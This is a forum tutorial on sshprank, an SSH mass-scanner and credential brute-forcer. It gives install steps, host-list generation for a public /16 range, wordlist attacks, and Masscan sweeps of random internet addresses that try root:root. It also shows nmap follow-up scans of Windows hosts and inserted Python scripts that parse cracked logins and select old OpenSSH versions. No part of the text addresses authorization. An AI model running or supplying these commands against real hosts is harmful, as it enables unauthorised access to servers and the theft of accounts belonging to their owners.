Lord777
Professional
This article focuses on sshprank, a fast scanner for large numbers of SSH servers. The program looks for hosts running SSH and tries to log in with the credentials you give it, that is, it brute-forces logins. It can also collect the banners of a large number of SSH servers very quickly.
If you don't know what SSH is, check out the online book The Complete Guide to SSH on Linux and Windows. SSH is an essential service for connecting and executing commands on remote Linux computers. But SSH is also heavily used on FreeBSD computers and even sometimes on Windows.
How to install sshprank
Installing sshprank on Kali Linux
Code:
sudo apt install python3-pip
git clone https://github.com/noptrix/sshprank
cd sshprank
sudo pip3 install -r docs/requirements.txt
./sshprank.py -H
Recent Kali releases refuse system-wide pip installs by default; if the pip3 step fails with an "externally managed environment" message, create a virtualenv (python3 -m venv venv && . venv/bin/activate) and run pip3 install -r docs/requirements.txt inside it without sudo.
Installing sshprank in BlackArch
Code:
sudo pacman -S sshprank
Installing sshprank on Windows
Start by installing Python at How to Install Python and PIP on Windows 10.
After installing Python and PIP, download the sshprank source archive from the link: https://github.com/noptrix/sshprank/archive/master.zip
Unpack the archive.
Open a Command Prompt or PowerShell (if you don't know how, see the article "Setting up a PowerShell Desktop Environment on Windows and Linux").
Go to the folder of the unpacked archive using the cd command (you will have a different path to the folder, so edit the command accordingly):
Code:
cd C:\Users\MiAl\Downloads\sshprank-master\
Install the required dependencies:
Code:
pip install -r docs\requirements.txt
Check (the program's usage help should be printed):
Code:
python .\sshprank.py -H
Further work with the program is the same as on Linux, but instead of sshprank you run python .\sshprank.py, for example:
Code:
python .\sshprank.py -h 138.201.59.125 -v
How to create a host list
sshprank does not accept IP ranges directly (the Masscan pass-through described later in this article is the exception), so we first need to create a host list.
If you are confused about the following examples, see the section on Expanding curly braces.
So, I want to scan the range 138.201.0.0/16. To list the hosts, I run the following command:
Code:
echo -e 138.201.{0..255}.{0..255}"\n" | sed 's/ //' > hosts.txt
Let's check what we got:
Code:
head -n 20 hosts.txt
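The brace-expansion one-liner is quick, but it also emits the network and broadcast addresses of the range and cannot append a port list. As an added example (not part of the original article and not code from the sshprank project), the following Python script builds the same host[:ports] file with the standard ipaddress module; the function names expand_targets and write_hostlist are mine, and the port numbers are the ones used elsewhere in this article:

```python
import ipaddress
from typing import Iterable, List


def expand_targets(networks: Iterable[str], ports: Iterable[int] = ()) -> List[str]:
    """Expand CIDR ranges into sshprank target lines of the form host[:p1,p2,...].

    Network and broadcast addresses are skipped (ipaddress.hosts()), so a /24
    yields 254 lines instead of 256. Without ports, sshprank falls back to 22.
    Overlapping ranges are deduplicated so no target is tried twice.
    """
    suffix = ":" + ",".join(str(p) for p in ports) if ports else ""
    lines: List[str] = []
    seen = set()
    for net in networks:
        # strict=False also accepts a host address with a prefix, e.g. 138.201.59.125/24
        network = ipaddress.ip_network(net, strict=False)
        for host in network.hosts():
            if host in seen:
                continue
            seen.add(host)
            lines.append(f"{host}{suffix}")
    return lines


def write_hostlist(path: str, networks: Iterable[str], ports: Iterable[int] = ()) -> int:
    """Write the expanded list to `path`, one target per line; returns the line count."""
    lines = expand_targets(networks, ports)
    with open(path, "w", encoding="ascii") as fh:
        fh.write("\n".join(lines) + "\n")
    return len(lines)


if __name__ == "__main__":
    # The article's range, plus the non-default ports used later in the text.
    n = write_hostlist("hosts.txt", ["138.201.0.0/16"], ports=[22, 2022, 22222])
    print(f"wrote {n} targets to hosts.txt")
```

Run it with python3 and point sshprank at the resulting hosts.txt with -l. The generated file is identical in format to the one from the echo/sed command, just without the .0 and .255 lines of each /24, which never answer on SSH anyway.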
How to run sshprank
In sshprank, hosts can be specified with the following options:
-h <HOST[:PORTS]> - a single host to crack. Multiple ports can be separated by commas, e.g. 22,2022,22222 (default port: 22)
-l <FILE> - a file with hosts to crack, one per line, in the format <host>[:ports]. Multiple ports can be separated by commas (default port: 22)
That is, if we want to specify a single host, then this can be done using the -h option:
Code:
./sshprank.py -h 138.201.59.125
You can also specify ports (otherwise the default port for SSH service 22 is used):
Code:
./sshprank.py -h 138.201.59.125:22,2022,22222
By default the program prints nothing at all: it does not even show the compromised hosts, logins and passwords on the terminal (they are only written to owned.txt, see below). To see this information as it is found, use the -v option:
Code:
./sshprank.py -h 138.201.59.125 -v
If no username and password are specified, “root” is used for both.
How to specify logins and passwords files in sshprank
To specify a username, password or dictionaries with them, the following options are used:
-u <USER> - single username (default: root)
-U <FILE> - list of usernames
-p <PASS> - single password (default: root)
-P <FILE> - list of passwords
-C <FILE> - list of USER:PASSWORD combinations
Tiny dictionaries are supplied with the program:
- lists/user.txt - usernames
- lists/pws.txt - passwords
- lists/combo.txt - username:password combinations
Let's run sshprank against a single host with our own username and password lists; every combination from the two files is tried:
Code:
sshprank -h 192.168.0.100 -U user.txt -P passwords.txt -v
Sshprank results
If we hadn't used the -v option, then almost nothing would have been output. The -v option displays information about connection attempts, successfully matched accounts, as well as reasons for failure, for example:
- [!] could not connect: … - no SSH connection could be established (the SSH service is not running on that port, a firewall drops the connection, or the host is offline).
- [!] login failure: … (auth timeout) - the server did not answer the authentication attempt within the timeout. A wrong password can cause this on servers that deliberately delay failed attempts, but so can an overloaded or rate-limiting server, so on its own it is not a definite rejection.
- [!] login failure: … (auth failed) - the server explicitly rejected the credentials (wrong username or password).
- [!] login failure: … (pubkey auth) - the server accepts only public-key authentication, so password guessing against it is pointless; drop such hosts from your list.
Notice the line with the green asterisk:
Code:
[*] found login: 192.168.0.100:22:mial:2
That is, the login (mial) and password (2) were found for the service on port 22 on the host 192.168.0.100.
All successfully found logins and passwords are saved to the owned.txt file in the current working folder. The name and path to the file can be changed with the -o <FILE> option.
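To process -v output or a saved log without reading it by eye, here is an added Python example (my code, not the article's and not part of sshprank). It recognises the four line shapes listed above; the found-login line is the article's own, while the host:port:user:pass text I put after "login failure:" is an assumption, since the article elides it. The parser splits the found line at the first three colons only, so a password containing ':' survives intact, and repeated hits are reported once:

```python
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Optional


class FoundLogin(NamedTuple):
    host: str
    port: int
    user: str
    password: str


# Line shapes as shown in the article's -v output. The target text after
# "login failure:" is assumed (the article elides it with "...").
FOUND_RE = re.compile(r"^\[\*\] found login: (?P<rest>.+)$")
FAIL_RE = re.compile(r"^\[!\] login failure: .*\((?P<reason>auth timeout|auth failed|pubkey auth)\)\s*$")
NOCONN_RE = re.compile(r"^\[!\] could not connect:")


def parse_found(line: str) -> Optional[FoundLogin]:
    """Turn '[*] found login: host:port:user:pass' into a FoundLogin.

    Only the first three colons are separators, so a password like 'pa:ss' is kept whole.
    """
    m = FOUND_RE.match(line.strip())
    if not m:
        return None
    parts = m.group("rest").split(":", 3)
    if len(parts) != 4 or not parts[1].isdigit():
        return None
    host, port, user, password = parts
    return FoundLogin(host, int(port), user, password)


def summarize(lines) -> Dict[str, object]:
    """Collect found credentials (deduplicated, in order of appearance) and failure counts."""
    found: List[FoundLogin] = []
    seen = set()
    reasons: Counter = Counter()
    for raw in lines:
        line = raw.strip()
        cred = parse_found(line)
        if cred is not None:
            if cred not in seen:
                seen.add(cred)
                found.append(cred)
            continue
        m = FAIL_RE.match(line)
        if m:
            reasons[m.group("reason")] += 1
        elif NOCONN_RE.match(line):
            reasons["could not connect"] += 1
    return {"found": found, "reasons": reasons}


# Constructed sample of -v output (only the first found-login line is the article's own).
SAMPLE = """\
[!] could not connect: 192.168.0.5:22
[!] login failure: 192.168.0.100:22:root:root (auth failed)
[!] login failure: 192.168.0.100:22:root:toor (auth timeout)
[*] found login: 192.168.0.100:22:mial:2
[*] found login: 192.168.0.100:22:mial:2
[*] found login: 192.168.0.7:2022:backup:pa:ss:word
[!] login failure: 192.168.0.9:22:root:root (pubkey auth)
""".splitlines()


if __name__ == "__main__":
    result = summarize(SAMPLE)
    for c in result["found"]:
        print(f"ssh {c.user}@{c.host} -p {c.port}   # password {c.password!r}")
    print(dict(result["reasons"]))
```

Feed it the terminal output saved with tee (sshprank ... -v | tee run.log) and read the reasons counter first: a run dominated by "pubkey auth" or "could not connect" tells you the host list needs pruning before you spend time on more password lists.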
How to scan large amounts of SSH
We can specify a list of hosts with the following option:
-l <FILE> - a file with hosts to crack, one per line, in the format <host>[:ports]. Multiple ports can be separated by commas (default port: 22)
Launch example:
Code:
./sshprank.py -l hosts.txt -U lists/user.txt -P lists/pws.txt -v
With many hosts the verbose output scrolls past far too fast to follow. Instead of re-reading owned.txt by hand, watch it with the following commands:
Code:
touch owned.txt
tail -f owned.txt
The first command will create the file if it doesn't already exist. And the second command will immediately display all changes in this file, if any.
How to quickly collect SSH banners on a large network
The -b option is used for this:
-b <FILE> - a file with hosts whose sshd banners should be collected, in the format <host>[:ports]. Multiple ports can be separated by commas (default port: 22)
That is, with this option, you can specify a list of hosts in the same format as the -l option. Only the operating mode will change - banners will be collected instead of brute-force.
Below is an example of launching, the results obtained will be saved to the specified file:
Code:
./sshprank.py -b hosts.txt > ssh_banners.txt
You can monitor the contents of this file in the same way:
Code:
touch ssh_banners.txt
tail -f ssh_banners.txt
Banners can be used for a variety of purposes. For example, you can find all Windows computers running the SSH service:
Code:
cat ssh_banners.txt | grep -i windows
On Windows servers the SMB and RDP ports are quite often open as well, so the hosts picked out of the banner file are a good starting point for follow-up scans.
To filter Windows hosts:
Code:
grep -i windows ssh_banners.txt | awk -F ':' '{print $1}' | sort -u > windows_hosts.txt
Scanning to SMB and NetBIOS:
Code:
sudo nmap -iL windows_hosts.txt -p 139,445 --open
Scanning for open RDP ports:
Code:
sudo nmap -iL windows_hosts.txt -p 3389 -sU -sS --open
An example of getting RDP information and Windows computer name:
Code:
sudo nmap -p 3389 -sU -sS --script 'rdp-*' 138.201.134.34
To find computers running FreeBSD:
Code:
cat ssh_banners.txt | grep -i bsd
Using banners, you can search for old versions of Linux distributions, specific versions of the SSH implementation that are known to be vulnerable, perform statistical analysis, and so on.
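As an added example of that kind of banner analysis (my code, not the article's and not part of sshprank), the Python below classifies banners into OS families, extracts OpenSSH versions, and writes per-family host lists of the kind fed to nmap -iL above. It assumes the -b output file has lines of the form host:port:banner; the article only shows that the host is the first colon-separated field, so adjust parse_banner_line if your file differs. The sample banners are constructed, and the version cutoff in older_than is a parameter you choose, not a claim about any particular version:

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Tuple

# Assumed layout of the -b output file: host:port:banner (the article only
# shows that the host is the first colon-separated field).
_VERSION_RE = re.compile(r"OpenSSH_(?:for_Windows_)?(\d+(?:\.\d+)+)")

# (family label, case-insensitive substring) in priority order; "bsd" also
# catches OpenBSD/NetBSD, like the article's `grep -i bsd`.
_FAMILIES = [
    ("windows", "windows"),
    ("bsd", "bsd"),
    ("ubuntu", "ubuntu"),
    ("debian", "debian"),
    ("dropbear", "dropbear"),
]


def parse_banner_line(line: str) -> Optional[Tuple[str, int, str]]:
    """Split 'host:port:banner' into (host, port, banner); the banner itself may contain ':'."""
    parts = line.strip().split(":", 2)
    if len(parts) != 3 or not parts[1].isdigit():
        return None
    return parts[0], int(parts[1]), parts[2].strip()


def classify(banner: str) -> str:
    """Map a banner to a coarse OS/implementation family ('other' if unknown)."""
    low = banner.lower()
    for label, needle in _FAMILIES:
        if needle in low:
            return label
    return "other"


def openssh_version(banner: str) -> Optional[Tuple[int, ...]]:
    """Return the OpenSSH version as a comparable tuple, or None for non-OpenSSH servers."""
    m = _VERSION_RE.search(banner)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None


def hosts_by_family(lines) -> Dict[str, List[str]]:
    """Unique hosts per family, sorted, ready for `nmap -iL`."""
    groups: Dict[str, set] = defaultdict(set)
    for line in lines:
        rec = parse_banner_line(line)
        if rec:
            groups[classify(rec[2])].add(rec[0])
    return {k: sorted(v) for k, v in groups.items()}


def version_histogram(lines) -> Counter:
    """How many services (one per host:port line) run each OpenSSH version."""
    hist: Counter = Counter()
    for line in lines:
        rec = parse_banner_line(line)
        ver = openssh_version(rec[2]) if rec else None
        if ver:
            hist[".".join(map(str, ver))] += 1
    return hist


def older_than(lines, threshold: Tuple[int, ...]) -> List[str]:
    """Hosts whose OpenSSH is older than `threshold`, e.g. (7, 4); the cutoff is yours to pick."""
    hits = set()
    for line in lines:
        rec = parse_banner_line(line)
        ver = openssh_version(rec[2]) if rec else None
        if ver and ver < threshold:
            hits.add(rec[0])
    return sorted(hits)


# Constructed sample of an ssh_banners.txt file (not real scan output).
SAMPLE = """\
138.201.10.1:22:SSH-2.0-OpenSSH_for_Windows_8.1
138.201.10.2:22:SSH-2.0-OpenSSH_7.4 FreeBSD-20170903
138.201.10.3:22:SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3
138.201.10.3:2022:SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3
138.201.10.4:2022:SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
138.201.10.5:22:SSH-2.0-dropbear_2019.78
138.201.10.6:22:SSH-2.0-OpenSSH_5.3
""".splitlines()


if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE
    for family, hosts in hosts_by_family(lines).items():
        with open(f"{family}_hosts.txt", "w") as fh:  # e.g. windows_hosts.txt for nmap -iL
            fh.write("\n".join(hosts) + "\n")
        print(f"{family}: {len(hosts)} host(s)")
    print("OpenSSH versions:", dict(version_histogram(lines)))
    print("older than 7.4:", older_than(lines, (7, 4)))
```

Run it as python3 banners.py ssh_banners.txt. The family files replace the grep/awk pipeline above and already deduplicate hosts that answered on several ports; the version histogram is the "statistical analysis" mentioned above, and older_than gives you the host list for whichever version cutoff your own vulnerability research calls for.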
Masscan options
sshprank can call Masscan for host discovery, and its -m option passes a string of options straight through to Masscan. Masscan must be installed, and because it sends raw packets both commands below run under sudo. A few examples:
A fast Masscan sweep of 192.168.13.1/24 on ports 22 and 2022, followed by cracking of whatever SSH services it finds with the default root:root credentials. Everything inside -m '...' is handed to Masscan unchanged:
Code:
sudo ./sshprank.py -m '-p22,2022 --rate=5000 --source-ip 192.168.13.37 --range 192.168.13.1/24'
That is, the IP ranges to scan are given to Masscan with its --range option.
Generate a thousand random IPv4 addresses, scan them for port 22 at 1,000 packets per second and try the credentials root:root against every sshd found:
Code:
sudo ./sshprank.py -m '-p22 --rate=1000' -r 1000 -v
You can specify not only these, but any Masscan options. Description of all Masscan options: https://kali.tools/?p=976
All sshprank options
All sshprank options can be found on the page: https://kali.tools/?p=5554
Conclusion
sshprank comes in handy when your targets are SSH servers scattered across a large network or when you need to collect SSH banners from large ranges very quickly. For example, from a /16 range (65536 IP addresses) you can collect the banners of all SSH services in just a few minutes.